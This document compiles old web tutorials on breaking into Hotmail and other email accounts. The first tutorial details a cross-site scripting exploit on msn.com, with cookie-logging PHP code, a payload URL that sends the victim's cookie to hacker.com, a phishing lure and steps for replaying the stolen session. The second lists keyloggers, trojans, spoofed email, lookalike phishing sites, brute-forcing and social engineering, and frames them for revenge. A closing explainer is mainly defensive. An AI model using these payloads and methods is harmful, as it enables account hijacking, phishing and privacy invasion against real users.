HACK HOTMAIL EMAIL PASSWORDS

This document explain how to exploit a security hole I found in

http://www.hotmail.com/. With this exploit you can access other people’s mailboxes,

view their contacts and much more. All that needs to be done is send this user

an e-mail with a link/url to an internet-page you created. When this user

clicks on this url, his inbox is all yours.

How does it work

One of the following things is needed to login into Hotmail: >When you know his/her e-mail address and password you can login with

his username and password on http://www.hotmail.com/

>When you know his/her account information like country and zip-code,

and you are able to answer his/her secret question. In this case

You can reset his/her password, and login just like option 1, with a new password.

>When you have access to his alternate e-mail address,

you could send a password reset e-mail message to that account to reset his/her password.

>When you have his/her ‘cookie’ for passport.net or hotmail.msn.com you can

‘fake’ his/her cookie, and make hotmail believe you are already logged in as this user.

here use Option 4 to make my exploit work. This exploit is using the cookie

from hotmail.msn.com to access the ‘victims’ inbox. Because the cookie

is not limited to the domain hotmail.msn.com, u can also use an exploit

on the site msn.com to steal the cookie from the victim. When searched

msn.com for an exploit called “HTML Injection” or “Cross Site Scripting”

(XSS), it took me about 30 minutes to find one. With this exploit type

I’m able to insert additional pieces of html or javascript into a page of msn.com.

When I insert the code: ,

the user will see a message box just like the picture below when he visits that site.

The real HTML injection example with popup can be viewed at:
http://ilovemessenger.msn.com/?mkt=nl-nl’);alert(document.cookie);escape(’

With the text you can see in the “alert message-box” above, everybody

with some knowledge is able to access my inbox. This text is send by

my browser to hotmail every time I visit a site with the domain “msn.com”.

This method is used so hotmail knows I am still logged in. The text in the

popup is called a “cookie”. A trick used by attackers is to fake somebody

else’s cookie. I will explain one easy method, although there are different

ways of doing it. I can fake cookies with a helper program called “Proxomitron”.

Proxomitron acts like a proxy server with the option to change, fake or block html headers.

Cookie-text, like the text in the popup, is send by the browser invisibly in

an html-header called “cookie”. Because Proxomitron is able to fake headers,

this program is very useful to me.

I will explain later how proxomitron must be configured to fake cookies.

How does the attacker get the cookie? Showing a popup to the user with his

cookie information does not help the attacker. The attacker wants the text

now shown in the popup-box. To log cookies the hacker needs to create a

internet-page with PHP or ASP. This is to log some text to a log file on a webserver.

I’ve created a simple PHP script that is able to log text to a log file. I’ve named

this file “cookielogger.php” and its content looks like this:

{ if (!$handle = fopen($filename, ‘a’)) { echo “Error: Unable to write to the log file”; exit; } else

{ if (fwrite($handle, “\r\n” . $_GET[”cookie”]) === FALSE) { echo “Error while writing to log file”; exit; } }

echo “Successfully wrote a string to the log file”; fclose($handle); exit; } echo “nothing to write to the log file”; exit; ?>

I uploaded this file to a webserver. As example I’ll use the

fake internet site http://www.hacker.com/. To test the PHP

script I’ll go to http://www.hacker.com/cookielogger.php?cookie=test.

I can see the text “Successfully wrote a string to the log file”.

When I’m now browsing to http://www.hacker.com/logfile.txt I can see the text “test”.
When I go to http://www.hacker.com/cookielogger.php?cookie=this text is being logged,

the text “this text is being logged” will be appended to the log file: http://www.hacker.com/logfile.txt

Cookielogger.php is now ready to log text strings, so it’s also ready to log cookies.

I use the Cross Site Scripting exploit to inject a code that will redirect the user to

http://www.hacker.com/cookielogger.php with the argument “cookie” filled with the user’s cookie.

So when the user visits the msn site with added code, he will be redirected to

http://www.hacker.com/cookielogger.php?cookie=hiscookie and the hacker

can read his cookie information at the site http://www.hacker.com/logfile.txt because

“hiscookie” is now logged to a textfile the hacker can see. the code I’m inserting in msn.com will look like this:

See the two printscreens below of the results with the cookielogger.

Remember “www.hacker.com” is not really used, its just an example.

The real HTML injection example to log the cookie is:

http://ilovemessenger.msn.com/?mkt=nl-nl’);

location.href=’http://www.hacker.com/cookielogger.php?cookie=

‘+escape(document.cookie);escape(’

Okay, the exploit is ready to go. We could send the link above to

the victim in the hope he clicks the link.

But there aren’t many people who go to a site like “ilovemessenger.msn.com”.

Also when the users sees something like “document.cookie”

in the url he’ll probably think twice before clicking it.

When we create a new php page called “redirect.php” with the following content:
http://ilovemessenger.msn.com/?mkt=nl-nl’);

location.href=’http://www.hacker.com/cookielogger.php?cookie=’+escape(document.cookie);escape(’”); exit; ?>

and place this file online on http://www.hacker.com/redirect.php.

Now when we send the victim an email with this link and he clicks

on it he will be redirected to the ilovemessenger site plus exploit,

here he will be redirected to hacker.com/cookielogger.php with

his cookie of msn.com being logged in the log file.

When these actions are completed you are ready to start exploiting the victim.

If anyone really would try to break into somebody’s hotmail account he also

would change cookielogger.php to redirect on, or to show an innocent message,

so that the user wouldn’t notice that his cookie was logged.

When a malicious hacker sends an e-mail containing the link to the redirect

script and the victim opens his new e-mail message he will see something like this:

When the victim clicks the text “click this link” the exploit will come in motion.

In real life there are tons of methods of persuading the victim to click on a link.

The hacker is patiently waiting for a new entry in the file http://www.hacker.com/logfile.txt.

When the user finally clicks the link and the hacker notices extra text in the log file the fun can start.

When the victim is fallen for your trick, the log file looks like this:

Now the hacker has stolen the cookie of the victim, the hacker can proceed in faking his

cookie when entering hotmail. Somewhere at the start of this explanation I talked about

“Proxomitron” to fake cookies. I will now explain how to make the settings to fake this cookie.

Proxomitron looks like this:

Just place a ‘v’ before “Outgoing Header Filters” because that’s what we want to do.

We want to send the users cookie to the web server as it is or own cookie.

Press the button “Headers” to create a new header to fake the cookie.

In the new window, fill in these values:
HTTP Header: “Cookie: a description”
URL Match: “”
Header Value Match: “*”
Replacement test: the users cookie

Apply the new header by putting a ‘v’ before the new header in the “Out” column and press apply to save the changes.

Proxomitron is now ready for faking the cookie. Now setting up your browser.

You need to set your browser to use a proxy-server. It differs per browser how to make that setting.
In Internet Explorer: “Tools -> Internet Options… -> Connections -> LAN Settings -> Proxy server”
In Mozilla Firefox: “Tools -> General -> Connection Settings -> Manual proxy configuration”

Set the Address to “127.0.0.1″ (your own pc) and as port : “8080″ (the port of Proxomitron proxy server)

When your browser is setup to use your own proxy server, you can go to the following url :
http://by103fd.bay103.hotmail.msn.com/cgi-bin/hmhome?fti=yes

When successful you can now see the inbox of the victims mail box.

Ethics and law

Nothing I did was illegal, but when you are hacking somebody else his inbox you are breaking the law

. When this happens you can be prosecuted and go to jail. Don’t let this happen to you!
I published this document to let the world know about the security risk.

By publishing this document Microsoft is forced to patch the hole immediately.
If I hadn’t told Microsoft about this security hole (I mailed them), or if I wouldn’t have found it,

it is possible somebody else would have found it. If this guy would have been a ‘black-hat-hacker’

he and his friends would surely have used this security hole to hack a lot of mail-boxes.

A final word

Security holes have been found in Hotmail multiple times in the past.

After putting this tutorial online, I found out that Microsoft had a similar bug three years ago,

found by N|ghtHawk (a fellow Net-Force member).

I hope that after this time MSN will be more careful with it’s security, because small exploits can have great consequences.

well i use dis tweak by “Alex de Vries” from Holland…

see ya with more stuff…!!

enjoy..!!

HACK HOTMAIL EMAIL PASSWORDS

NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.

---

Note: This file was intentionally named 'How to GET a hotmail password', because I will cover almost all methods I can think of (A lot of them won't actually be hacking).

Note: If there are any mistakes/inacuracies in this file or any extra info you wanna add, feel free to add it at the bottom after the line and sign it please. Please do not change the original text though.

OK, so you wanna get someone's hotmail password? Whether you are interested in generally understanding more about hacking, just getting revenge on someone, or are bored or for whatever other reasons you might be reading this, um... I forgot what I was gonna say heh. OK nevermind here we go.

Before you start reading about how to actually get hotmail passwords you have to remember some things:

• Never do this kind of stuff from work/school
• Remember that Hotmail probably has huge logs (depending on the method you use) of what you have done... etc
• If you start doing this for money and the cops hear of it and decide to take your PC, even if you have deleted the 'evidence' it can always be easily recovered. Never be confident.
• Remember now recently hacking has been considered an act of terrorism sometimes and terrorsim these days is dealt with extremely severly.
• It's not a good idea generally to tell many people about this. I read once a file with the rule 'Only tell people you trust with your life'.

Any programs I refer to in this file can either be found in http://www.google.com/ or http://www.download.com/ and you can also find out a lot of info from http://www.textfiles.com and http://www.totse.com/

Methods:

Some methods listed depend on how gullible the victim is, and/or if you can gain physical access to their PC...etc

1. This is the easiest way I guess. If you are present when your victim is typing his/her password, try peeping over their shoulder lol.
2. If you have physical access to the machine they use to access their account usually, try installing a keylogger (you can download them from anywhere on the net) These secretly record all keystrokes on the computer. If it records it in a simple text file, then search for their username and see what comes right after it. Remember that if they mistype it and use 'del' or 'backspace' it might be a little tricky for you.
3. If you have physical access to the machine your victim usually uses, and their password is saved in MSN for example or something like Outlook but as asterisks (*) then download 'Snadboy's Revelation' (v. small program) which will easily reveal the password.
4. On a spy site once, I saw a little device you plug your keyboard in, and then you plug that into your PC, where your keyboard usually plugs in. Hardly noticable and not too expensive so you might wanna look out for it if you are paranoid. It was able to record the last 36,000 keys pressed I think.
5. If your victim ever types their password in a space where it doesn't get changed into asterisks (*) (I don't know why or where that would ever be the case) then if you have a 'Van Eck Phreaking' Device then you could watch their screen from a remote location. Van Eck phreaking is when you catch the electromagnetic field that the monitor emits and reproduce the image. This method is sooo unlikely and almost pointless for me to type up lol but I thought I'd waste my and your time.
6. With a trojan like Sub7 for example you can take control of people's computers. You can get 'saved' passwords (cached) like if they are already typed in MSN as *'s and you can also activate a keylogger.
7. If you download 'Ghostmail' you can fake an email coming from the 'Hotmail Team' or whatever, and make it sound all formal and pretend that you need to verify that they are the rightful owners or whatever and ask them to reply with the password. You can make it reply to you but seem to come from a different address.
8. There was a file that my anti-virus considered to be a virus I downloaded a few years ago, but I don't have anymore (Accidental Data Loss) so I don't know the name anymore. It was a little window that came up and told you that your cookie has expired (It looked soo real) and asked you to type in your password and username. Then when you type it in it saves a file to your C drive, which you would have to get from the victim's computer somehow, for example using a RAT (Remote Administraion Torjan) a program that allows you to control someone's computer.
9. If you know the victim well try guessing the password or blackmailing/getting it out of someone who knows. Use your imagination.
10. Look around the victim's desk for post-its or whatever.
11. Try Sex, Love, Mum, God, 1234 (or 4321 etc etc etc) or the name of someone they love, try it backwards. Also try secret, and password and the last 4 digits of their phone number..etc.
12. NOTE: The easiest way for hacker sometimes to get a password (this doesn't really apply in this case) is to call up and ask for it. For example you could do some research on your victim and call up and say: 'Hi, I am John Smith and I forgot my password.. I left it on my desk at work somewhere. Can you give it to me please so I can work from home' or use your common sense. Social Engineering.
13. If you are devious/evil enough you can gain the victim's trust somehow to get it.
14. Pay a hacker to do it for you.
15. If you get a different password of theirs, usually people use the same passwords for everything
16. OK here we go. This method is the method most hackers will talk about if you ask them how to hack hotmail. This is probably the nearest to hacking anyway. Go to http://www.hackology.com/ and download Munga Bunga's HTTP Brute Forcer AND The definition files package (and a good word list if you can find one somewhere - but you will have to modify it from *.txt to *.lst and put it in the correct location, replacing the old one). Once you are ready, READ all of the help files that come with it and then use common sense to tick the appropriate boxes in the brute forcer. (Tick 'Don't try passwords shorter than 8 characters) because Hotmail doesn't allow you to have shorter passwords than that so it saves time. Munga Bunga's is the quickest one software wise. Depending on the quality of your wordlist and your connection speed though it could take days/hours to get someone's password this way.
17. What you could do is, you make a site saying something like 'Send an email to .....@hotmail.com and in the email subject line put your victim's username, followed by your username and your password, separated with dots. Within a few days you should receive an email with your victim's password as the hotmail servers will have given your username admin priveleges.' Basically you con people into giving you their passwords.
18. You could also copy all of the HTML code of the hotmail site and use it on your own site and buy a domain name really similar like www.hotnail.com and send an email using Ghostmail telling people to check out the new and better service etc or tell your friends. (In the email tell them to click on a link not type it out otherwise they will notice - Link like CLICK HERE). With this method you will have to change the HTML code slightly though so that it sends the info to you somehow (not sure how as I am not that good with HTML) and then link them back to hotmail or something so they don't notice. (CHECK FURTHER ON IN THE FILE THERE IS A METHOD SIMILAR)
19. OK there are 4 methods by SnEzE here that I have, but I am not sure they work because I have never tried them. Here they are anyway: ( I Will put my comments in XX's )

    Brute force hacking

    a. Use telnet to connect to port 110 (Hotmail´s server)

    b. Type USER and then the victim´s username

    c. Type PASS and then the guess a password

    d. Repeat that until U have found the correct password.

    !. This is called brute force hacking and requires patience. It´s better than trying to guess the victims password on hotmail homepage only because it´s faster.

    XX I am not sure this works as this file might be antient XX

20. By SnEzE again:

    The Best way

    a. Get the username of the victim ( It usually stands in the adress-field )

    b. Then type " www.hotmail.com/cgi-bin/start/victimsusername "

    c. You´re in!

    !. This hack only work if you are on the same network or computer as the victim and if he don´t log out.

    XX This probably works. Just a guess XX

21. By SnEzE again:

    I_3_I - The old way

    a. Go to Hotmail´s homepage and get a account (if you don´t already got one)

    b. Log Out

    c. Now type the victims username.

    d. Look at the source code. XX In Internet Explorer, it's View, Source I think. XX

    e. On the fifth row you should find "action=someadress"

    d. Copy that adress and paste it into the adress-field

    e. You´re in...

    !. As you can see it´s a long procedure and the victim have plenty of time to log out.

22. By SnEzE again:

    I_4_I - Another...

    a. Go to hotmail´s homepage

    b. Copy the source code.

    c. Make a new html file with the same code but change method=post to method=enter

    d. "view" the page

    e. Change the adress to www.hotmail.com/ (don´t press enter!)

    f. Make the victim type in his username and password

    g. Look in the adress-field. There you´ll see ...&password:something...

    !. This is the way I use, because it lets you know the password. ( If he exits the browser you can see the password in the History folder! I´ve made an example of this trick that you can use at: hem1.passagen.se/christog/index.htm. Good Luck!

XX Here is the rest of his file XX

READ!

Hotmail's sysops have changed the "system" so that the victim may log out even if you are inside his/her account. So don't waste your time!

This text comes from http://hem1.passagen.se/christog/hotmail.htm Remember that this is V.2.0.. More will come... http://www.themoleman.co.uk/hacking.htm

XX Don't know how up to date this is though... XX

OK After ages I think those are all the methods I can think of. Remember to feel free to add at the bottom after the line! Oh and try to keep the formatting so that it doesn't become unpleasant for others to read.

Now that you have read this file you don't have an excuse to bug hackers with stupid questions about hacking hotmail anymore!! (And remember even stuff you might think is hacking can't even be considered hacking sometimes.)

One more thing. Think of this as a bonus. Here is a file I wrote quickly a few weeks ago, because of the number of people bugging me about it so here it is:

This file was written, because I have found too many people asking me how to get rid of the MSN 'Pic' Virus.

1. Press Ctrl+Alt+Del ONCE and select 'MsgSprd'
2. Hit End Task
3. Go to your 'Received Files' folder (you can get to it in MSN using: File, Open Received Files, OR you will probably find it in C:\My Documents\Messenger Service Received Files
4. Delete the pic file. It will usually be called 'pic1234....exe' (You might not see the 'exe') -- IF you get a message telling you you can't delete it, because windows is using it then you have to repeat Step 1 and 2.
5. Go to 'Start'
6. Then 'Run'
7. Type: 'msconfig' and press Enter/Return
8. Select the 'Startup' Tab
9. UNtick the box left of 'MSN Messenger Service'
10. Press 'Apply'
11. Press 'OK'
12. A Message should appear asking you if you want to restart, but you don't really need to. You should though. --IF next time you start up, it gives you an error message about pic or MsgSprd or something you will have to make sure you did steps 5 - 11 right.
13. After restarting you are free of the virus ;)

Encrypted_Error

NOTE: That only works on some versions of Windows!

Also now that you know all this, I hope you use it sensibly and don't be a right bastard/bitch with it.

'Knowledge is power' heh just thought I'd add that. I remember that when I think of hacking!

Encrypted_Error

HOW TO HACK YAHOO, HOTMAIL, AOL

We get numerous calls from people who want to recover AOL®, Yahoo® or Hotmail® or other online and email passwords. We do not do this type of work. Many of these people claim that they have lost their passwords because they have been hacked and now need to get their password back. As we have reviewed information on the web, we found very little real information about the actual techniques that could be used to hack these services. So we decided to pull together a detailed explanation.

What follows is a detailed explanation of the methodologies involved. We do not condone any illegal activity and we clearly mention in this article techniques that are illegal. Sometimes these methods are known as "Phishing."

THE HOAX

Let's dispose of one technique that is absolutely a hoax (meaning a fraud: something intended to deceive; deliberate trickery intended to gain an advantage.) If you see a newsgroup post or web page with something like the following, it is a hoax and will not work.

: : : (([[THIS REALLY WORKS ]])) : : :

(1) send an E-mail to passwordrecovery@yourdomainhere.com

(2) In the subject box type the screenname of the person whose password you wish to steal

(3) In the message box type the following: /cgi-bin/start?v703&login.USER=passmachine&class=supervisor&f={your aol password}&f=27586&javascript=ACTIVE&rsa

(4) Send the e-mail with priority set to "high" (red ! in some mailprograms)

(5) wait 2-3 minutes and check your mail

(6) Read the message.-Where YOUR password was typed before, NOW, the password of the screenname in the code string is there!!!

Why does this work? It�s a special decryption-server that AOL-employees can use to decrypt passwords.The aolbackdoor account is a bot that reads your authentification from the message body and identifiying you as a valid AOL Staff-member, you will get the password mailed back to you. The trick is that this Bot�s script seems to be a little bit buggy and it automatically recogises you as an supervisor (AOL-Staff member), even if you use a normal AOL account. This means, that EVERYONE having a valid AOL account can hack as many other accounts as he wants.

This is just a scam to steal your password and may explain some of the calls we get from people saying they were hacked. Never give your password to anyone. No legitimate web service or customer service representative will ask for it or need it. There is no magic email address or series of commands that will reveal the passwords of users.

LOCALLY STORED PASSWORDS

Most browsers, including Internet Explorer® and Netscape®, the AOL® client, and Windows® Dial-Up Connections allow you the option to store passwords. These passwords are stored on the local machine and (depending upon where and how it is stored) there is usually a method of recovering these passwords. Storing any password locally is insecure and may allow the password to be recovered by anyone who has access to the local machine. While we are not currently aware of any program to recover locally stored AOL® passwords, we do not recommend that these are secure. Software does exist that can recover most of the other types of locally stored passwords.

TROJAN

A Trojan is a program that is sent to a user that allows an attacker to control functions of the target computer, recover information from the target or to delete or damage files on the target. The name Trojan is given because the program will usually come attached to some other program or file that entices you to run it. There are a wide variety of Trojans any number of which can be programmed to capture passwords as they are typed and to email or transmit them to a third party. To protect yourself against Trojans, you should never execute or download software or files that are not from a trusted source. It is critical that anyone working on internet use a virus protection program (which should catch most Trojans.) Note that since a Trojan requires the password to be typed or stored in order to be recovered, this is not an effective way to recover your own password. It could explain, however, how someone could lose their password to a hacker. Sending someone a Trojan program is certainly illegal and we do not recommend or condone this activity. A Trojan is unlikely to be effective in recovering a particular account password since it requires the target to install it. However, hackers will often bulk mail Trojans to thousands of people in the hope that a small percentage will get caught. Legitimate account holders who may have been caught by a Trojan and can authenticate themselves should contact their service provider to have their account passwords reset.

KEYLOGGER

A keylogger is a program or piece of hardware that records all keyboard keystrokes to an encrypted file which can then be read later. Based on the order of the keystrokes, it is usually easy to identify the password(s) from the file later. Like the Trojan, this also requires that someone actually type the password. Keyloggers come in two types: hardware and software. A hardware keylogger can be fitted between the keyboard cable and the computer and can be activated with a few keystrokes. It is then left in place until after the password that you are looking to recover is typed. Later it is removed and the file of keystrokes is examined for the password. A hardware keylogger is undectable by anti-virus software. A software keylogger is installed on a system and effectively has the same function, however, it is a little bit more complex to use since it must be installed to run stealthily to be effective. A keylogger could be used to steal a password from someone who is using an office computer or sharing a computer. It is possible that installing and using such a device or piece of software could be illegal depending upon whether the target has a presumption of privacy when using the computer on which the keylogger is installed.

IMPERSONATION

It is possible to impersonate a program on a computer by launching windows that look like something else. For instance, let's say you login to the MSN® service and visit a website (in this case a hostile website.) It would be possible for this website to pop-up some windows that look like something else. They could look almost identical to windows that an inexperienced user might expect from his local computer. If these could trick you into entering your password, then you could end-up sending your password to the attacker. Windows such as these could be created to mirror virtually any program or series of actions. Your browser will likely identify your operating system and your IP address might identify your ISP. Therefore, a hostile website could target you with a series of screen shots that look exactly as they should on your system. The key is that the screen shots are not coming from your system, but are coming from the hostile website. First, creating such a hostile website is probably fraudulent and illegal. We do not recommend or condone this activity. To protect yourself against this type of attack, make sure to configure your browser for high security and enable warnings for any code that is executed on your system. SNIFFING If two people do not share the same computer, but do share the same network, it may be possible for one to sniff the others' packets as they sign-on. The traffic between your computer and the internet site you are accessing may be able to be recorded and decrypted or "played-back." This is not a simple attack to execute, but is possible if two people are close to one another and share a hub. Again, this is likely to be illegal and we do not condone this activity. BRUTE-FORCE ATTACK Many people want to find software to perform a brute-force attack. This is really impractical. It would take hundreds of thousands of years to attempt any kind of reasonable brute-force attack on AOL®, Yahoo® or Hotmail® and this would expand exponentially if the password is longer than the minimum length. Using multiple computers or multiple sessions could reduce this to merely thousands of years. This is highly illegal since these services own the servers on which an account is hosted. Even if you are hacking your own account, you don't own the servers and the service is going to monitor and log this activity. It is extremely unlikely that you could recover a password in this way, but it is extremely likely that you'd be arrested and prosecuted for doing this. SOCIAL ENGINEERING Social engineering is the name given to the art of attacking the person, rather than the computer or system. The basic principle is that many people can be talked into giving someone else their id and password if they think it is someone that they can trust. For instance, I might call someone and say I was from AOL and that I was finally getting around to responding to their technical support question. I would then ask you to describe the problem that you are having and tell you that we have a solution. However, I just need to verify the account. Can you give me the username and password again? A surprising number of people would fall for this obvious scam. There is no limit as to how elaborate this can be. The more information that is given by the caller, the more realistic or believable the call is. Again, never give your password to anyone. No legitimate customer service representative will ask for this information. These are the basic methods that we are aware of for hacking an AOL®, Yahoo®, Hotmail® or any other dial-up or on-line password. Hopefully this will answer some questions and help you protect yourself against these attacks.